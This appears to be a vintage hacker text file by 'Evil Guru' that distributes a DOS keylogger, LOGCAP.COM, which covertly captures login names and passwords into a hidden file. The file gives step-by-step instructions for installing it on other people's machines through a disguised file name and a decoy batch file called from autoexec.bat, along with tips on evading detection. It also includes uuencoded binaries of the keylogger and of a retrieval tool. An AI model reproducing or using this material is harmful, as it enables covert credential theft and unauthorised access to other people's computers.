 *** Evil Guru says: Make love not war ***

 L     OOO   GGG         CCC  AAA  PPPP  TTTTT U   U RRRR  EEEEE
 L    O   O G           C    A   A P   P   T   U   U R   R E
 L    O   O G  GG  ---  C    AAAAA PPPP    T   U   U RRRR  EEEEE
 L    O   O G   G       C    A   A P       T   U   U R R   E
 LLLL  OOO   GGG         CCC A   A P       T    UUU  R  RR EEEEE

 Written By:     Evil Guru

 Subject:        Login capture from PC-networks   


The login process can take some different shapes on networks etc. The dumbest
way is also the most common. (As in many other situations). I refer to the
machines that boots up from own harddrives. In such occurences this program
may (and should) be used. It waits for the keystroke sequence 
'L','O','G','I','N'.

When this happens it captures the contents of the next two written lines,
which may be the LOGIN text and the PASSWORD text. The result is stored on the
harddrive on a hidden phile on the root of c:. The filename is ~G45DS32.TMP.
Normally if a person detects such a file he deletes it, which we hope that he
does rather than inspecting it. If he does he would see the scancodes, which
is different from plain ascii, which makes inspection more expert-demanding.

(I.e no text editor could me used to inspect the text.)

To infect a computer:

Place the file logcap in some not-so-often-used directory with a non-saying
name. It must still have the .COM-suffix.

In autoexec.bat, insert a row invoking the program. Perhaps it is more safe
to invoke another .bat-file called, say 'EMSTEST.BAT' from autoexec and
letting this file invoke our file with full path.

Say that we place LOGIN.COM under windows with the name WIN286.COM.

Then we add a line in autoexec.bat that says:

@C:\EMSTEST

Then we create a file EMSTEST.BAT that says:

@C:\WINDOWS\WIN286.COM

(The whirlpool supresses a sort of text-output that is unnessecary).

Here the LOGIN.COM file comes:


---CUT HERE---

section 1 of uuencode 5.24 of file logcap.com    by R.E.M.

begin 644 logcap.com
MZ5D!'`)0Y&`*P'A>'@X?5HLV`P&!_EP"=0_&!J(!`,<&`P$<`E[I0`"(!$:)
M-@,!/!QT!%[I,0"@H@$*P'0Q_LAT6,8&H@$`,\`&CL`FH:``HQ@")J&B`*,:
M`B;'!J``O`$FC!ZB``=>'UCJ`````%=1!@X'BPX#`;X<`BGQ_(#Y!G4,OZ,!
M\Z9U!<8&H@$!QP8#`1P"!UE?Z\W&!J(!`NO&`"88(A<Q'`0('$,Z7'Y'-#5$
M4S,R+E1-4`!04U%2'@8SP([`#A^A&`(FHZ``H1H")J.B`/NP(.8@N`(]NJP!
MS2&+V',,M#RY`@#-(8O8Z0D`N`)",\DSTLTAM$"+#@,!NAP"*=&)%@,!S2&T
M/LTA!Q]:65M8Z@``````````````````````````````````````````````
M````````````````````````````````````````````,\".V*$D`":C;`&A
:)@`FHVX!^L<&)``%`8P.)@#[N``QNB8`S2$`
`
end
sum -r/size 25611/561 section (from "begin" to "end")
sum -r/size 65257/386 entire input file

---CUT HERE---


To examine the result a couple of days later the file EVAL.COM may be used.
Keep it on disk. When you enter the computer, put in the disk and write:
a:\eval.com. If the row is missing in autoexec.bat :~~( you must detect if
the LOGCAP file also is deleted. If not, delete it and wait for some weeks
until you try again, for safety reasons.

Then the result is stored on the disk in CAPTURE.TXT, readable with a text-
editor. The log-file on the harddrive is erased and the computer is ready to
go on tracing logins. To stop the tracing on a computer you must alter the
autoexec.bat back and delete the LOGCAP.COM file. (That perhaps was given
another name by you).

Here comes EVAL.COM

---CUT HERE---

section 1 of uuencode 5.24 of file eval.com    by R.E.M.

begin 644 eval.com
MZ0$!_P``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````"A`@",RRG8+0`0
M<PFT";J3!,TAS2"T";J$`\TA_(S(!0`0CL`S_[0*N@,!S2&@!`$*P'0-,N2)
MP;X%`?.DN`T*J[D@`+`J\ZJX#0JKN`(]NKP$S2&C!`5S#+0\,\G-(:,$!>D+
M`(O8N`)",\DSTLTAN``]NK<#S2%S`^GY`*,&!;0_BQX&!;D`\+H(!<TAB<%0
M5[\(!;`<,^T&#@?RKG4'10O)=`+B]0=?OO`#N2,`\Z0SP%")Z$#1Z+L*`#/2
M]_.`PC!2"\!U]E@+P'0#JNOXN`T*J[X(!5E15KX3!+D(`/.D7EF[RP2L/!QT
M"SPX=P+7JN+SZ4$`X@/I*0"X#0JK45:^&P2Y"P#SI%Y9K#P<=!(\.7<%N\L$
MUZKB\+@-"JOI%0#B"[Y$!+DY`)"0Z0@`N`T*JZNKXJ"^)@2Y'@#SI(O/C,@%
M`!".V+1`+HL>!`4STLTAM#Z+%@8%S2&T/HL6!`7-(0X?M`FZ?03-(;1!NK<#
MS2'-(+['`[DI`/.DZ[A%;G1E<B!H96%D97(@.B`D*BHJ*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B1#.EQ^1S0U1%,S,BY435``5&AE<F4@=V5R
M92!N;R!C87!T=7)E<R!O;B!T:&ES(&UA8VAI;F4N#0I.=6UB97(@;V8@;&]G
M:6YS(&]N('1H:7,@;6%C:&EN92`Z($Q/1TE.(#H@4$%34U=/4D0@.B`-"BH@
M16YD(&]F(&-A<'1U<F4@*@T*#0H-"@T*#0H-"@T**BHJ(%1H92!L;V=F:6QE
M(&AA9"!A;B!U;F9O<F5S965N(&EN=&5R<G5P=&EO;BX@*BHJ"@T*"E!R;V=R
M86T@8V]M<&QE=&5D#0HD4V]R<GDL(&]U="!O9B!M96UO<GDL($-L;W-E('-O
M;64@5%-2.G,-"B1!.EQ#05!455)%+E185``@(#$R,S0U-C<X.3`M/2`@45=%
K4E1954E/4%M=("!!4T1&1TA*2TP[)V`@7%I80U9"3DTL+B\@*B``````_P``
`
end
sum -r/size 18471/1451 section (from "begin" to "end")
sum -r/size 45094/1033 entire input file

---CUT HERE---

Have phun !!!

    ͻ
     Ŀ 
            CONTACT ORGANIZED CONFUZION VIA VOICEMAIL           
            -----------------------------------------           
      UNITED STATES HEAD QUARTERS 1+212-415-0239 AFTER 22:00    
      SWEDISH HEAD QUARTERS       020-795954 BOX : 336-2255     
      
    ͼ
